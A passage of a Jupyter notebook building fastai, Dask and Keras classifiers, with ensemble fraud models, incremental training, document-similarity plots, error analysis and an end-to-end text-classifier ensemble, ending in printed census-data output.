predict_proba(self, X):\n probs_list = [mdl.predict_proba(X) for mdl in self.model_list]\n return np.array(probs_list).mean(axis=0)\n\n# all label values\nlabel_vals = list(df[label_col].value_counts().keys())\n\ndef dask_read_and_sample(blocksize:int=10**6, sample_size:int=1e3, label_vals=label_vals):\n \n # reading train data\n print(f'================== dask reads train_df.csv===================')\n\n # reading train & test with dask data_file = 'train_df.csv'\n train_dd = dd.read_csv(data_path+'train_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True,\n ) \n print(f'================== dask reads test_df.csv===================')\n\n test_dd = dd.read_csv(data_path+'test_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True\n )\n # let us stratify to get the same number of rows for frauds and non-frauds\n sample_ls = [train_dd.query(f'{label_col} == {label_val}').sample(frac=sample_size) for label_val in label_vals]\n #sample_positive = train_dd.query(f'{label_col} == 1').sample(frac=sample_size)\n #sample_negative = train_dd.query(f'{label_col} == 0').sample(frac=sample_size)\n \n # concatenate the dataframe\n df_sampled = dd.concat(sample_ls)\n \n return df_sampled.compute(scheduler='synchronous')\n\n\n@track_memory_use(close=True, return_history=True)\ndef dask_read_test_and_score(model, blocksize):\n \n # reading test\n df_test = dd.read_csv(data_path+'test_df.csv', blocksize=blocksize)\n\n # splitting design matrix and target\n X_test = df_test.drop(label_col, axis=1)\n y_test = df_test[label_col].persist(scheduler='synchronous')\n \n # scoring and printing result\n y_prob = X_test.map_partitions(model.predict_proba).compute(scheduler='synchronous')\n\n from sklearn.metrics import roc_auc_score\n macro_roc_auc_ovo = roc_auc_score(y_test, y_prob, multi_class=\"ovo\", average=\"macro\")\n \n weighted_roc_auc_ovo = roc_auc_score(\n y_test, y_prob, multi_class=\"ovo\", average=\"weighted\"\n )\n \n macro_roc_auc_ovr = roc_auc_score(y_test, y_prob, multi_class=\"ovr\", average=\"macro\")\n \n weighted_roc_auc_ovr = roc_auc_score(\n y_test, y_prob, multi_class=\"ovr\", average=\"weighted\"\n )\n print(\n \"One-vs-One ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovo, weighted_roc_auc_ovo)\n )\n print(\n \"One-vs-Rest ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovr, weighted_roc_auc_ovr)\n )\n \n#example: _, mem_history_3 = dask_read_test_and_score(model, blocksize=5e6)\n\n\n# using a function so we can track memory usage\n@track_memory_use(close=False, return_history=True)\ndef dask_read_sample_and_fit_model(blocksize, sample_size, n_models):\n \n # init model list\n model_list = []\n \n # loop for each model\n for _ in range(n_models):\n \n # reading train data\n df_train = dask_read_and_sample.__wrapped__(blocksize, sample_size)\n\n # fitting model\n model_list.append(fit_model.__wrapped__(df_train))\n \n return EnsembleWrapper(model_list)\n \n# executing\nmodel, mem_history_1 = dask_read_sample_and_fit_model(blocksize=10e6, sample_size=0.05, n_models=10)\n_, mem_history_2 = dask_read_test_and_score(model, blocksize=5e6)", "_____no_output_____" ], [ "\nmultimodal_clf = Fastai_Multimodal_Classifier()\nmultimodal_clf.fit(df=train_df, label_col=label_col, cnt_cols=cnt_cols, cat_cols=cat_cols,txt_cols=txt_cols,img_cols=img_cols)\n(preds0, preds1), (probs0, probs1) = multimodal_clf.get_preds(test_df)\n(preds0, preds1), (probs0, probs1)", "_____no_output_____" ], [ "", "_____no_output_____" ] ], [ [ "## bigdata ML solu2: incremental learning\n\n", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\ntf.keras.backend.set_floatx('float64')\n\nclass KerasWrapper:\n def __init__(self, model, feat_mean, feat_std):\n self.model = model\n self.feat_mean = feat_mean\n self.feat_std = feat_std\n \n def predict_proba(self, X):\n \n preds = self.model.predict((X - self.feat_mean)/self.feat_std)\n return np.c_[preds, preds]\n \n# using a function so we can track memory usage\n@track_memory_use(close=False, return_history=True)\ndef dask_read_and_incrementally_fit_keras(blocksize):\n print(f'================== dask reads train_df.csv===================')\n\n # reading train & test with dask data_file = 'train_df.csv'\n train_dd = dd.read_csv(data_path+'train_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True,\n ) \n print(f'================== dask reads test_df.csv===================')\n\n test_dd = dd.read_csv(data_path+'test_df.csv', \n engine='python',\n encoding='utf-8', # 'utf-8-sig', #\n error_bad_lines=False,\n blocksize=blocksize,\n assume_missing=True\n )\n # reading df with dask***********************************\n df_train = dd.read_csv(data_path+'train_df.csv', blocksize=blocksize)\n \n # creating keras model\n model = Sequential([Dense(16, activation='relu'),\n Dropout(0.25),\n Dense(16, activation='relu'),\n Dropout(0.25),\n Dense(16, activation='relu'),\n Dropout(0.25),\n Dense(1, activation='sigmoid')])\n model.compile(loss='binary_crossentropy')\n \n # getting mean and std for dataset to normalize features\n feat_mean = df_train.drop(label_col, axis=1).mean().compute(scheduler='synchronous')\n feat_std = df_train.drop(label_col, axis=1).std().compute(scheduler='synchronous')\n \n # loop for number of partitions\n for i in range(df_train.npartitions):\n \n # getting one partition\n part = df_train.get_partition(i).compute(scheduler='synchronous')\n \n # splitting\n X_part = (part.drop('isFraud', axis=1) - feat_mean)/feat_std\n y_part = part['isFraud']\n \n # running partial fit\n model.fit(X_part, y_part, batch_size=512)\n \n return KerasWrapper(model, feat_mean, feat_std)\n\nmodel, mem_history_1 = dask_read_and_incrementally_fit_keras(blocksize=5e6)", "_____no_output_____" ], [ "", "_____no_output_____" ], [ "", "_____no_output_____" ], [ "", "_____no_output_____" ] ], [ [ "# 7) Extra & Experimental\n", "_____no_output_____" ], [ "## experiment: create ensemble classifier using individual classifiers' various output\n\nI can extract various info from each individual classifier, including\n\n- probs (highest level features)\n- embeddings (intermediate level features)\n- encoding of txt_cols, img_cols, cnt_cols, cat_cols (lowest level features)", "_____no_output_____" ] ], [ [ "# load lm and clf based on 'skills' column\nlm0, clf0 = load_fastai_text_classifier(df, \n txt_col=txt_cols[0],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n flag_auto_lr=False\n )\n\n# load lm and clf based on 'title' column\nlm1, clf1 = load_fastai_text_classifier(df, \n txt_col=txt_cols[1],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n flag_auto_lr=False\n )\n", "_____no_output_____" ], [ "# get df[txt_cols[0]] embeddings_df e1 \ne1 = get_fastai_docs_embs(docs=df[txt_cols[0]], learn=clf0, lm=lm0, df=None, txt_col=None)\n# get df[txt_cols[1]] embeddings_df e2\ne2 = get_fastai_docs_embs(docs=df[txt_cols[1]], learn=clf1, lm=lm1, df=None, txt_col=None)\n\n#construct a embedings ls\nembs_ls = [e1, e2]", "_____no_output_____" ], [ "embs_ls =[e1, e2]", "_____no_output_____" ], [ "#pickle embs_ls\nimport pickle\nwith open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\n", "_____no_output_____" ], [ "# get prediction on labels and probabilities\npreds0, prods0 = fastai_learner_preds(learner=clf0, test_df=df, label_col=label_col, txt_col=txt_cols[0])\npreds1, prods1 = fastai_learner_preds(learner=clf1, test_df=df, label_col=label_col, txt_col=txt_cols[1])", "_____no_output_____" ], [ "#pickle probs_ls\nprobs_ls = [prods0.numpy(), prods1.numpy()]\nwith open(\"probs_ls.pickle\",\"wb\") as f:\n pickle.dump(probs_ls,f)", "_____no_output_____" ] ], [ [ "## module: Visualize doc similarity\n\n", "_____no_output_____" ] ], [ [ "#export\n\"\"\"\nimport pandas as pd\nimport re\nimport seaborn as sns\nimport tensorflow as tf\n\"\"\"\ndef normalize(data):\n return (data - np.min(data)) / (np.max(data) - np.min(data))\n## permutation test\ndef perm_test(x1, x2):\n \"\"\"return the p-value of similarity bw x1 and x2\"\"\"\n import math, random\n from scipy import stats\n similarity = lambda x1, x2: sum(xj*xk for xj,xk in zip(x1, x2))/math.sqrt(sum(xj**2 for xj in x1)*sum(xk**2 for xk in x2))\n\n lx, sr = len(x1), []\n for j in range(10000):\n mj = random.sample(x1, lx)\n sr.append(similarity(mj, x2))\n shape, loc, scale = stats.weibull_min.fit(sr)\n ## -log10(p)\n ej = ((sr-loc)/scale)**shape*math.log10(math.exp(1.))\n p = 10**(-ej)\n return p\n\ndef plot_similarity(labels, features, rotation, flag_norm_corr=True):\n norm_features = [tf.linalg.normalize(t)[0].numpy() for t in features]\n corr = np.inner(norm_features, norm_features)\n if flag_norm_corr:\n corr = normalize(corr)\n\n sns.set(font_scale=1.2)\n g = sns.heatmap(\n corr,\n xticklabels=labels,\n yticklabels=labels,\n vmin=0,\n vmax=1,\n cmap=\"YlOrRd\")\n g.set_xticklabels(labels, rotation=rotation)\n g.set_title(\"Semantic Textual Similarity\")\n\ndef plot_docs_sim(label_doc_dic, doc_embeddings, flag_norm_corr=True):\n \"\"\"get embedding vectors for docs and plot their similarity\n Args:\n label_doc_dic:dict with label:doc pairs\n doc_embeddings: a list of embedding vectors\n flag_norm_corr: whether or not normalized corr e.g. max(X)->1, min(X)->0, x-> x/(max(X)-min(X))\n Return:\n None\n \"\"\"\n \n if isinstance(doc_embeddings, scipy.sparse.csr.csr_matrix):\n doc_embeddings = doc_embeddings.toarray()\n\n plot_similarity(list(label_doc_dic.keys()), doc_embeddings, 90, flag_norm_corr)", "_____no_output_____" ], [ "# load validation data\ndf = pd.read_csv(data_path+'JD_skills_similarity_validation.csv')\n# extract title from job requisition\ndf['Title'] = [re.split('-|,', ' '.join(x.split(' ')[1:]))[0] for x in df['Job Requisition']]\n# concate multiple text cols\ndf['Title_Skills'] = df[['Title','Skills']].agg(', '.join, axis=1)\n# construct a dictionary with key=label, value=skills\nlabel_doc_dic = dict(zip(df['Code'],df['Title_Skills']))\nlabel_doc_dic", "_____no_output_____" ], [ "doc_embeddings = get_fastai_docs_embs(docs=list(label_doc_dic.values()), learn=clf, lm=lm, df=None, txt_col=None)", "_____no_output_____" ], [ "plot_docs_sim(label_doc_dic, doc_embeddings, flag_norm_corr=True)\n", "_____no_output_____" ], [ "x1 = list(doc_embeddings[0])\nx2 = list(doc_embeddings[1])\nperm_test(x1, x2)", "_____no_output_____" ] ], [ [ "## Experiment2: Error analysis\n", "_____no_output_____" ] ], [ [ "# classifier performance by confusion matrix\ninterp = ClassificationInterpretation.from_learner(multimodal_clf)\ninterp.plot_confusion_matrix(figsize=(8,8), dpi=60)", "_____no_output_____" ], [ "interp.print_classification_report()", "_____no_output_____" ], [ "# how to get prediction/inference on validation data? https://forums.fast.ai/t/unable-to-get-predictions-on-validation-dataset-v2/79171/2\n\n# get the idxs of validation data\nvalid_idxs = clf0.dls.valid.get_idxs()\n\n# get predictions on validation data\npreds_valid, probs_valid = fastai_learner_preds(learner=clf0, test_df=df.iloc[valid_idxs,], label_col=label_col, txt_col=txt_cols[-1])\npreds_valid, probs_valid", "_____no_output_____" ], [ "df_res = df.iloc[valid_idxs,][[txt_cols[-1], label_col]].copy()\ndf_res['pred'] = preds_valid\ndf_res['prob'] = probs_valid.numpy().max(axis=1)\ndf_res", "_____no_output_____" ], [ "# false positive samples subset idxs in valid_idxs\ndf_fp = df_res[df_res[label_col] == 0][df_res['pred'] == 1][['label', 'pred', 'prob', txt_cols[-1]]]\ndf_fp", "/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:2: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n \n" ], [ "# false negative samples\ndf_fn = df_res[df_res[label_col] == 1][df_res['pred'] == 0][['label', 'pred','prob', txt_cols[-1]]]\ndf_fn", "/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:2: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n \n" ], [ "list(set(df_fn.index ) & set(valid_idxs)), list(set(df_fp.index ) & set(valid_idxs)) ", "_____no_output_____" ] ], [ [ "## module: Error Analysis", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_classifier_error_analysis(learner, df:pd.DataFrame, label_col:str, txt_col:str=None):\n \"\"\"get the error analysis of a fastai text classifier on its validation dataset\n Args:\n learner:a trained fastai text classifier e.g. clf2\n df:pd.DataFrame the whole dataframe learner was trained on. learner has the info on how to split df into train and valid\n label_col:str e.g. 'label'\n txt_col:str e.g. 'title_raw+hard_skills_name'\n Ref: https://forums.fast.ai/t/unable-to-get-predictions-on-validation-dataset-v2/79171\n \"\"\"\n # show classifier performance by confusion matrix\n interp = ClassificationInterpretation.from_learner(learner)\n interp.plot_confusion_matrix(figsize=(8,8), dpi=60)\n\n #show classification report\n interp.print_classification_report()\n\n # get the idxs of validation data\n valid_idxs = learner.dls.valid.get_idxs()\n\n # get predictions on validation data\n preds_valid, probs_valid = fastai_learner_preds(learner=learner, test_df=df.iloc[valid_idxs,], label_col=label_col, txt_col=txt_col)\n\n # prep df for result\n df_res = df.iloc[valid_idxs,][[txt_col, label_col]].copy()\n df_res['prediction'] = preds_valid\n df_res['probability'] = probs_valid.numpy().max(axis=1)\n\n\n # false positive samples subset idxs in valid_idxs\n df_fp = df_res[df_res[label_col] == 0][df_res['prediction'] == 1][['label', 'prediction', 'probability', txt_col]]\n\n # false negative samples\n df_fn = df_res[df_res[label_col] == 1][df_res['prediction'] == 0][['label', 'prediction','probability', txt_col]]\n return df_fp, df_fn\n", "_____no_output_____" ], [ "# get false_positives and false_negatives \ndf_fp, df_fn = get_fastai_classifier_error_analysis(learner=clf0, df=df, label_col=label_col, txt_col=txt_cols[-1])\n\ndf_fp", "_____no_output_____" ], [ "df_fn", "_____no_output_____" ] ], [ [ "### experiment\nI need to convert tab_learn1, tab_learn2 as End-to-End classifiers which take raw input and output preds, probs", "_____no_output_____" ] ], [ [ "import pickle\nwith open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\nwith open(\"embs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n\nwith open(\"probs_ls.pickle\",\"wb\") as f:\n pickle.dump(probs_ls,f)\nwith open(\"probs_ls.pickle\", \"rb\") as f:\n probs_ls = pickle.load(f)", "_____no_output_____" ], [ "#export\ndef split_idxs(df, train_size=.9, flag_random_split=True):\n \"\"\" split df index into 2 parts: train_idxs and test_idxs \n Args:\n df: the dataframe of all your data\n train_size (float in [0,1], default 0.9)\n flag_random_split(bool, default False): do you want random split idxs?\n Returns:\n (ls_train, ls_test): a 2-tuple of lists for train indices and test indices\n\n Example:\n df = pd.DataFrame({'c1':list(range(26)), 'c2':list(string.ascii_lowercase)})\n splits = split_idxs(df)\n ...\n # use splits to build TabularPandas taublar object\n to = TabularPandas(df, \n procs=procs,\n cat_names=cat_names,\n cont_names=cont_names,\n y_names=y_names,\n y_block=y_block,\n splits=splits)\n \"\"\"\n import random\n ls = range_of(df)\n print(ls)\n if flag_random_split:\n splits = RandomSplitter()(ls)\n else:\n ls_train = ls[:int(df.shape[0]*train_size)]\n ls_test = ls[int(df.shape[0]*train_size):]\n random.shuffle(ls_train)\n random.shuffle(ls_test)\n splits = (ls_train, ls_test)\n return splits\ndef train_ensembled_classifier_by_fastai_tabular(clfs, lms, df, label_col, txt_cols):\n \"\"\"based on fastai tabular learner, train 2 ensembled text classifiers, including\n 1) doc_embs\n 2) probs\n #TBD 3) ensembled of the above 2\n Args:\n clfs:list of fastai text learners e.g. clfs=[clf0, clf1, clf2]\n lms: list of fastai text language models e.g. lms=[lm0, lm1, lm2]\n df:pd.DataFrame containing txt_cols\n label_col:str e.g. 'label'\n txt_cols: list of text columns the clfs learned from e.g.txt_cols = ['title_raw', 'hard_skills_name', 'title_raw+hard_skills_name']\n\n Returns: a list of fastai tabular classifiers with \n - tab_clf_embs is the classifier trained with txt_col embeddings\n - tab_clf_probs is the classifier trained with probability predictions by clfs\n [tab_clf_embs, tab_clf_probs] \n \n \"\"\"\n # make sure txt_cols in df is string\n for col in txt_cols:\n df[col].fillna('', inplace=True) # replace NaN by ''\n df[col] = df[col].astype(str) # convert dtype from object to str\n\n # get docs embeddings list\n try:\n import pickle\n with open(\"embs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n except:\n embs_ls = []\n for (txt_col, clf, lm) in zip(txt_cols, clfs, lms):\n embs = get_fastai_docs_embs(docs=df[txt_col], learn=clf, lm=lm, df=None, txt_col=None)\n embs_ls.append(embs)\n\n #pickle embs_ls\n import pickle\n with open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\n\n\n # train a ensemble classifier using doc embedding\n tab_clf_embs = train_fastai_tabular_classifier_fr_embs_ls(embs_ls, df=df, label_col=label_col) \n\n # get prediction on labels and probabilities\n try:\n with open(\"probs_ls.pickle\", \"rb\") as f:\n probs_ls = pickle.load(f)\n #probs_ls = probs_ls #load_pickled_objs(object_names=['probs_ls'])\n except:\n probs_ls = []\n for (clf, txt_col) in zip(clfs, txt_cols):\n _, probs = fastai_learner_preds(learner=clf, df=df, txt_col=txt_col)\n probs_ls.append(probs.numpy())\n\n #pickle probs_ls\n with open(\"probs_ls.pickle\",\"wb\") as f:\n pickle.dump(probs_ls,f)\n\n # train a ensemble classifier using probs prediction\n tab_clf_probs = train_fastai_tabular_classifier_fr_embs_ls(probs_ls, df=df, label_col=label_col) \n\n return [tab_clf_embs, tab_clf_probs] \n\n\n", "_____no_output_____" ], [ "#dbck\ntab_learn0, tab_learn1 = train_ensembled_classifier_by_fastai_tabular(clfs=[clf0, clf1], lms=[lm0, lm1], txt_cols=txt_cols[:2], df=df, label_col=label_col) \n", "_____no_output_____" ] ], [ [ "## module: text classifier for multiple text columns\n\nThe end2end ensemble classifier combines multiple txt_clfs and tab_clfs:\n- inputs: df[txt_cols]\n- outputs: preds, probs\n\ndf[txt_col]=>`txt_clfs`=>emb_ls|probs_ls=>`tab_clfs`=>preds, probs\n\n\n**Why it matters**\n\n- ensemble of multiple txt classifiers combine signal from multiple txt_cols, therefore possibly improve classification performance\n\n- this will be a template for fastai multimodal classification\n - tab_clf =>tab_embs|probs\n - img_clf =>img_embs|probs\n - txt_clf =>txt_embs|probs\nThen end2end ensemble classifier can combine all 3 together.\n", "_____no_output_____" ] ], [ [ "class End2End_Fastai_Texts_Classifier():\n \"\"\"end to end fastai classifier for multiple txt_cols\"\"\"\n def __init__(self,txt_clfs=None, lms=None, tab_clfs=None):\n self.txt_clfs = txt_clfs # a list of fastai text classifiers\n self.lms = lms # a list of fastai text language models\n self.tab_clfs = tab_clfs # a list of fastai tabular classifiers\n \n \n def fit(self, df:pd.DataFrame, label_col:str, txt_cols:list):\n \"\"\"fit multiple fastai text classifiers for each col in txt_cols\n Args:\n df:pd.DataFrame, containing both label_col and txt_cols \n label_col:str, e.g. 'label'\n txt_cols:list, e.g. ['title_raw',\t'hard_skills_name',\t'title_raw+hard_skills_name']\n Returns:\n None (but update self.txt_clfs, self.lms, self.tab_clfs)\n \"\"\"\n # in case self.txt_clfs = None, make txt_clfs from stratch\n if self.txt_clfs is None:\n txt_clfs = []\n lms = []\n for txt_col in txt_cols:\n lm, txt_clf = train_fastai_text_classifier(df, \n txt_col=txt_col,\n label_col=label_col,\n model_path='/content/drive/My Drive/techskills/model/',\n flag_auto_lr=False\n )\n txt_clfs.append(txt_clf)\n lms.append(lm)\n self.txt_clfs = txt_clfs\n self.lms = lms\n\n # in case self.tab_clfs = None, make tab_clfs from stratch\n if self.tab_clfs is None:\n tab_clfs = train_ensembled_classifier_by_fastai_tabular(self.txt_clfs, self.lms, df, label_col, txt_cols)\n self.tab_clfs = tab_clfs\n\n def get_preds(self, df:pd.DataFrame, txt_cols:list):\n \"\"\"get predictions for test data df[txt_cols]\n Args:\n df:pd.DataFrame, txt_cols:list\n Returns:\n (preds0, preds1), (probs0, probs1), where\n - preds0, probs0: the predictions on test data based on txt_clfs embeddings extraction embs_ls\n - preds1, probs1: the prediction on test data based on txt_clfs output probs_ls\n \n \"\"\"\n # make sure txt_cols in df is string\n for col in txt_cols:\n df[col].fillna('', inplace=True) # replace NaN by ''\n df[col] = df[col].astype(str) # convert dtype from object to str\n\n # get docs embeddings list\n embs_ls = []\n for (txt_col, clf, lm) in zip(txt_cols, self.txt_clfs, self.lms):\n embs = get_fastai_docs_embs(docs=df[txt_col], learn=clf, lm=lm, df=None, txt_col=None)\n embs_ls.append(embs)\n \n # get prediction on labels and probabilities\n probs_ls = []\n for (clf, txt_col) in zip(self.txt_clfs, txt_cols):\n _, probs = fastai_learner_preds(learner=clf, df=df, txt_col=txt_col)\n probs_ls.append(probs.numpy())\n\n # tab_clfs[0] make predictions on embs_ls\n df_ = pd.concat([pd.DataFrame(embs) for embs in embs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n test_dl = self.tab_clfs[0].dls.test_dl(df_) #, with_labels=True\n probs0, _ = self.tab_clfs[0].get_preds(dl=test_dl)\n preds0 = probs0.numpy().argmax(axis=1)\n\n # tab_clfs[1] make predictions on probs_ls\n df_ = pd.concat([pd.DataFrame(embs) for probs in probs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n\n test_dl = self.tab_clfs[1].dls.test_dl(df_) #, with_labels=True\n probs1, _ = self.tab_clfs[1].get_preds(dl=test_dl)\n preds1 = probs0.numpy().argmax(axis=1)\n \n return (preds0, preds1), (probs0, probs1)\n\n", "_____no_output_____" ], [ "#dbck \nn2n_clf = End2End_Fastai_Texts_Classifier(txt_clfs=[clf0, clf1], lms=[lm0, lm1], tab_clfs=[tab_learn0, tab_learn1])\ndf_tmp = df.head(10).copy()\nn2n_clf.get_preds(df=df_tmp, txt_cols=txt_cols[:2])", "/usr/local/lib/python3.7/dist-packages/torch/autocast_mode.py:141: UserWarning: User provided device_type of 'cuda', but CUDA is not available. Disabling\n warnings.warn('User provided device_type of \\'cuda\\', but CUDA is not available. Disabling')\n/usr/local/lib/python3.7/dist-packages/torch/cuda/amp/grad_scaler.py:115: UserWarning: torch.cuda.amp.GradScaler is enabled, but CUDA is not available. Disabling.\n warnings.warn(\"torch.cuda.amp.GradScaler is enabled, but CUDA is not available. Disabling.\")\n" ] ], [ [ "### experiment: extract fastai tabular embeddings", "_____no_output_____" ] ], [ [ "#dbck\npath = untar_data(URLs.ADULT_SAMPLE)\ndf_ = pd.read_csv(path/'adult.csv')\nprint(df_.head())\nlabel_col_ = \"salary\"\ntab_learn = train_fastai_tabular_classifier(df=df_, label_col=label_col_, cnt_cols=None, cat_cols=None, lr=0.005, max_epochs=100, model_path='/content/drive/My Drive/fastai_multimodal/model/', model_name='tabular_model')\n", " age workclass fnlwgt education education-num \\\n0 49 Private 101320 Assoc-acdm 12.0 \n1 44 Private 236746 Masters 14.0 \n2 38 Private 96185 HS-grad NaN \n3 38 Self-emp-inc 112847 Prof-school 15.0 \n4 42 Self-emp-not-inc 82297 7th-8th NaN \n\n marital-status occupation relationship race \\\n0 Married-civ-spouse NaN Wife White \n1 Divorced Exec-managerial Not-in-family White \n2 Divorced NaN Unmarried Black \n3 Married-civ-spouse Prof-specialty Husband Asian-Pac-Islander \n4 Married-civ-spouse Other-service Wife Black \n\n sex capital-gain capital-loss hours-per-week native-country salary \n0 Female 0 1902 40 United-States >=50k \n1 Male 10520 0 45 United-States >=50k \n2 Female 0 0 32 United-States <50k \n3 Male 0 0 40 United-States >=50k \n4 Female 0 0 50 United-States <50k \nbefore adjustment...cnt_card=0.5\nbefore adjustment...cnt_card=16280\nbefore adjustment...txt_card=0.5\nbefore adjustment...txt_card=16280\n===== automatically identify\n cnt_cols=['education-num', 'fnlwgt']\n cat_cols=['age', 'capital-gain', 'capital-loss', 'education', 'hours-per-week', 'marital-status', 'native-country', 'occupation', 'race', 'relationship', 'sex', 'workclass'],\n img_cols=[], \n txt_cols=[] ======\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 554, 555, 556, 557, 558, 559, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 570, 571, 572, 573, 574, 575, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 586, 587, 588, 589, 590, 591, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 666, 667, 668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, 684, 685, 686, 687, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 698, 699, 700, 701, 702, 703, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 746, 747, 748, 749, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 762, 763, 764, 765, 766, 767, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 780, 781, 782, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 794, 795, 796, 797, 798, 799, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 810, 811, 812, 813, 814, 815, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 826, 827, 828, 829, 830, 831, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 842, 843, 844, 845, 846, 847, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 858, 859, 860, 861, 862, 863, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 874, 875, 876, 877, 878, 879, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 890, 891, 892, 893, 894, 895, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 975, 976, 